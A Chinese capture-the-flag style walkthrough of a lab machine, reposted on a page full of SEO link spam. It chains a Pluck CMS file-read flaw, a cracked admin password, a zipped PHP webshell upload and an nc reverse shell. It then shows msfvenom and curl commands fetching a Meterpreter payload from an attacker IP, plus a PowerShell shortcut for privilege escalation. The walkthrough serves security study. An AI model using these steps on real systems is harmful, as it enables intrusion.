当前位置: 首页 > news >正文

咋做黄页网站seo关键词快速排名

咋做黄页网站,seo关键词快速排名,sm luntan wordpress,app手机网站模板整体思路 端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建指向exe的快捷方式来提权-> 信息收集&端口利用 namp -sSVC 10.10.11.17目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb Pluck CMS文件读取 在…

整体思路

端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建指向exe的快捷方式来提权->

信息收集&端口利用

namp -sSVC 10.10.11.17

在这里插入图片描述

目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb

Pluck CMS文件读取

在这里插入图片描述

在主界面发现一个admin链接,访问它

在这里插入图片描述

在Exploit-db中搜索相关漏洞,发现存在Pluck CMS 4.7 - Directory Traversal

在这里插入图片描述

能够做到任意文件读取,这里也尝试读取win.ini

在这里插入图片描述

发现被检测出攻击行为,怀疑是…/被探测,尝试绕过也无效

回到POC,根据POC来看,它是针对于album的文件读取,那么有没有地方是上传album的地方呢?经过寻找,发现data目录下还有一个settings文件夹,其中的/modules/albums文件夹下有一个admin_backup.php文件

在这里插入图片描述

在这里插入图片描述

用刚刚的POC对该文件进行读取

在这里插入图片描述

得到一串密文,使用hash-identifier识别出可能的hash值后,用john对其进行解密

在这里插入图片描述

在这里插入图片描述

解得密码为lexypoo97,登录进网站

文件上传获取shell

Pluck插件还存在一个文件上传漏洞,登录后在admin.php?action=installmodule目录下上传zip文件,将php代码打包进zip文件中,上传后即可访问到该php文件,具体步骤如下

访问文件上传界面

在这里插入图片描述

将大马写入php文件,压缩成zip文件

在这里插入图片描述

上传zip

在这里插入图片描述

上传完成后,会在/data/modules下看到上传的文件

在这里插入图片描述

访问she11/she11.php

在这里插入图片描述

本地开启http服务,上传完nc.exe后将shell反弹到kali上

在这里插入图片描述

在这里插入图片描述

创建快捷方式提权(原理暂时未知)

在Common Applications文件夹下创建一个Windows快捷方式(.lnk),并将其指向/xmapp/htdocs/下的payload.exe

创建payload.exe,并上传

kali:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9100 -f exe -o payload.exe
靶机:curl http://10.10.14.8:9999/payload.exe -o payload.exe
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\payload.exe"
$lnk.Save()

等待一段时间后,相当于Brandon用户点击了该快捷方式,执行了payload.exe,拿到该用户权限

在这里插入图片描述
---------------------待更新(暂时没思路了QAQ)---------------------

http://www.ds6.com.cn/news/33709.html

相关文章:

  • 怎么给新公司做网站nba篮网最新消息
  • 作风建设年网站上海网站排名推广
  • 微信网站用什么做的站内免费推广有哪些
  • 校园网站怎么建it培训机构学费一般多少
  • 河北网站建设公司广告推广公司
  • 中国网站建设哪家公司好关键词优化公司排行
  • 日本人做的中国摇滚网站网站开发需要的技术
  • 建设行业个人信息网站怎样制作网站
  • 网站开发与设计英文书籍免费新闻源发布平台
  • 个人微企业网站模板广州seo工资
  • 宜春建设局网站网站设计软件
  • 微信小程序怎么制作音乐小程序合肥网站建设优化
  • 太原新建火车站网络推广员
  • 济南比较大的网站制作公司网站优化seo教程
  • 做图网站地图成都抖音seo
  • 济南优化网站技术企业网站管理系统源码
  • wordpress建站赚钱鞍山做网站的公司
  • 学网站开发应该学什么软件怎么制作网站教程步骤
  • 中国建筑集团有限公司怎么样seo简单速排名软件
  • 唐山做网站关键词都有哪些
  • 做旅游在网上用什么网站推广网络营销软文范例500字
  • 自己想做个网站怎么做南宁网络推广服务商
  • 重庆做的好的房产网站好泉州seo外包
  • 团购汽车最便宜的网站建设东莞网络优化排名
  • 市场营销策划包括哪些内容aso优化排名违法吗
  • 安卓网站客户端制作软件阿里云搜索引擎
  • 企业黄页电话信息查询入口seo免费诊断联系方式
  • 南宁网站排名外包品牌搜索引擎服务优化
  • wordpress导入数据杭州最专业的seo公司
  • 一般学校网站的后台用什么做如何提高百度搜索排名